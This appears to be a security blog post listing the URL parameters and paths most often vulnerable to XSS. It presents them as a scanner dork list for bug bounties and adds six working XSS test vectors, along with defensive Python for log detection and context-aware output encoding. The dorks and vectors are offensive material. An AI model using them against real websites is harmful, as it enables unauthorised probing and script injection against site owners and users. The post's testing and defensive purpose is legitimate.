Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After scanning more than a million websites for XSS and Open Redirect vulnerabilities, I took the time to compile statistics on the most frequently vulnerable parameters.

It can be used as a powerful dork list, so update your scanners and go get bounties!

First, here is the list of the most vulnerable parameters along with their frequency.

Dork            Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same, but with the corresponding path:

Dork (path and parameter)                         Frequency (%)
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1
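
On the defending side, the same frequency data can serve as a watchlist: parameter names that turn out to be reflected unsafely this often are the ones worth watching most closely in access logs. The following Python is an added example, not code from the original post: it parses combined-format access-log lines, URL-decodes the query parameters, flags values that carry tag, event-handler, javascript: or string-breakout markers, and raises the priority when the parameter name is on the watchlist. The watchlist is a hand-picked subset of the tables above, and the marker patterns, function names and log lines are this example's own constructions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Watchlist: a subset of the most frequently vulnerable parameter names from the
# tables above (which names to include is this example's own choice; extend it).
WATCHLIST = {"q", "s", "search", "id", "lang", "keyword", "query", "page", "url",
             "redirect_uri", "redirect", "msg", "error", "field[]"}

# Crude reflected-XSS markers, matched against the URL-decoded parameter value.
MARKERS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z]", re.I),                  # <img, </script
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),              # onerror=, onfocus=
    "script_scheme": re.compile(r"javascript\s*:", re.I),              # javascript:
    "string_breakout": re.compile(r"""["'`]\s*[-+]?\s*[a-z_$][\w$]*\s*\(""", re.I),  # '-alert(
}

# Combined log format: client identd user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_target(target):
    """Return one hit per query parameter whose decoded value trips a marker."""
    hits = []
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        matched = [label for label, rx in MARKERS.items() if rx.search(value)]
        if matched:
            hits.append({"path": parts.path, "param": name, "value": value,
                         "markers": matched, "on_watchlist": name in WATCHLIST})
    return hits


def scan_log(lines):
    """Parse combined-format access-log lines and collect suspicious parameters."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        for hit in scan_target(m.group("target")):
            hit.update(client=m.group("client"), status=int(m.group("status")))
            findings.append(hit)
    return findings


# Constructed sample log lines (not real traffic); the payloads are the ones
# listed on this page, sent through parameters taken from the tables above.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Dec/2019:10:01:02 +0000] "GET /?s=winter+sale HTTP/1.1" 200 5123',
    '203.0.113.7 - - [28/Dec/2019:10:01:09 +0000] "GET /search?q=%22%3E%3Cimg+src+onerror%3Dalert(1)%3E HTTP/1.1" 200 4821',
    '198.51.100.4 - - [28/Dec/2019:10:02:11 +0000] "GET /login?redirect_uri=javascript:alert(1) HTTP/1.1" 302 0',
    '198.51.100.4 - - [28/Dec/2019:10:02:40 +0000] "GET /index.php?lang=en&page=%27-alert(1)-%27 HTTP/1.1" 200 3301',
    '192.0.2.9 - - [28/Dec/2019:10:03:00 +0000] "GET /products?color=%3Cb%3Ebold%3C/b%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        priority = "HIGH" if f["on_watchlist"] else "low"
        print(f"[{priority}] {f['client']} {f['path']} {f['param']}={f['value']!r} {f['markers']}")
```

Running it flags four of the five constructed requests; the `color` hit is reported at low priority because that name is not on the watchlist, which is the point of keying the rule on the frequency tables. The markers are deliberately coarse (a signature approach will miss encoded or split payloads), so treat hits as triage input rather than proof of exploitation.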

I hope you enjoy this 🙂

Best XSS Vectors

Here’s a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
– URL query, fragment & path;
– all input fields.
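
To show what neutralizes each of these vectors on the defending side, here is an added Python example (not from the original post or from BruteLogic): a deliberately vulnerable template that reflects a search term into an attribute, a single-quoted JS string and an href; the same template with a context-specific encoder at each point (html.escape, JSON encoding with < > & escaped, and a URL scheme allow-list); and a small oracle built on the standard library's HTMLParser that reports whether a vector stayed inside its context. The template, the names (render_unsafe, render_safe, context_intact, audit) and the naive_quote_escape half-fix are this example's own constructions.

```python
import html
import json
from html.parser import HTMLParser
from urllib.parse import urlsplit

# The six vectors listed above, reused here as test inputs.
VECTORS = [
    '"><img src onerror=alert(1)>',
    '"autofocus onfocus=alert(1)//',
    '</script><script>alert(1)</script>',
    "'-alert(1)-'",
    "\\'-alert(1)//",
    'javascript:alert(1)',
]

def render_unsafe(q, naive_quote_escape=False):
    """Vulnerable page: q is reflected verbatim into an attribute, a JS string and an href."""
    # naive_quote_escape=True models the common half-fix of only turning ' into \' in the JS slot.
    js = q.replace("'", "\\'") if naive_quote_escape else q
    return ('<input value="' + q + '">'
            "<script>var q = '" + js + "';</script>"
            '<a href="' + q + '">back</a>')

def html_attr(value):
    """HTML attribute/body context: escape & < > " ' so the value cannot close the attribute or tag."""
    return html.escape(value, quote=True)

def js_string(value):
    """JS string context: JSON-encode, then also escape < > & so '</script>' cannot end the block."""
    return (json.dumps(value).replace("<", "\\u003c")
            .replace(">", "\\u003e").replace("&", "\\u0026"))

def safe_url(value, fallback="/"):
    """URL attribute context: allow http(s) and relative URLs only; other schemes get the fallback."""
    probe = "".join(ch for ch in value if ch > " ")  # drop whitespace/control chars before the scheme check
    scheme = urlsplit(probe).scheme.lower()
    if scheme and scheme not in ("http", "https"):
        return fallback
    return html_attr(value)

def render_safe(q):
    """Same page with a context-specific encoder at each reflection point."""
    return ('<input value="' + html_attr(q) + '">'
            "<script>var q = " + js_string(q) + ";</script>"
            '<a href="' + safe_url(q) + '">back</a>')

def _js_string_literal(src):
    """Read one JS string literal at the start of src; return (value, rest) or (None, src)."""
    if not src or src[0] not in "'\"":
        return None, src
    quote, out, i = src[0], [], 1
    while i < len(src):
        ch = src[i]
        if ch == quote:
            return "".join(out), src[i + 1:]
        if ch == "\\" and src[i + 1:i + 2] == "u":      # \uXXXX escape
            out.append(chr(int(src[i + 2:i + 6], 16)))
            i += 6
        elif ch == "\\":                                 # \x escape: next char taken literally
            out.append(src[i + 1:i + 2])
            i += 2
        else:
            out.append(ch)
            i += 1
    return None, src  # unterminated literal

class _Probe(HTMLParser):
    """Collects tag order, attributes per tag and raw <script> content."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs, self.script_data, self._in_script = [], {}, [], False
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.setdefault(tag, []).extend(attrs)
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script_data.append(data)

def context_intact(rendered):
    """Oracle: True only if the reflected value stayed inside all three contexts."""
    p = _Probe()
    p.feed(rendered)
    p.close()
    if p.tags != ["input", "script", "a"]:
        return False  # an extra tag was injected
    if [name for name, _ in p.attrs["input"]] != ["value"]:
        return False  # an extra attribute (e.g. onfocus) was injected
    data = "".join(p.script_data)
    if not data.startswith("var q = "):
        return False
    value, rest = _js_string_literal(data[len("var q = "):])
    if value is None or rest != ";":
        return False  # the string literal was closed early
    href = dict(p.attrs["a"]).get("href") or ""
    return not href.strip().lower().startswith("javascript:")

def audit(vectors=VECTORS):
    """For each vector: does the context survive the raw, naively escaped and hardened page?"""
    return {v: {"raw": context_intact(render_unsafe(v)),
                "naive_escape": context_intact(render_unsafe(v, naive_quote_escape=True)),
                "hardened": context_intact(render_safe(v))} for v in vectors}
```

The audit shows why the list carries two single-quote vectors: `'-alert(1)-'` closes a raw single-quoted string, while `\'-alert(1)//` is the one that fires once the application has "fixed" that by escaping `'` to `\'`, because the injected backslash eats the escape. Only the hardened rendering, which encodes for the specific context rather than stripping characters, keeps all six inside their slots. The oracle is a structural check, not a browser, so it is a regression test for encoders rather than a substitute for testing in a real client.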

From BruteLogic's Twitter account: https://twitter.com/brutelogic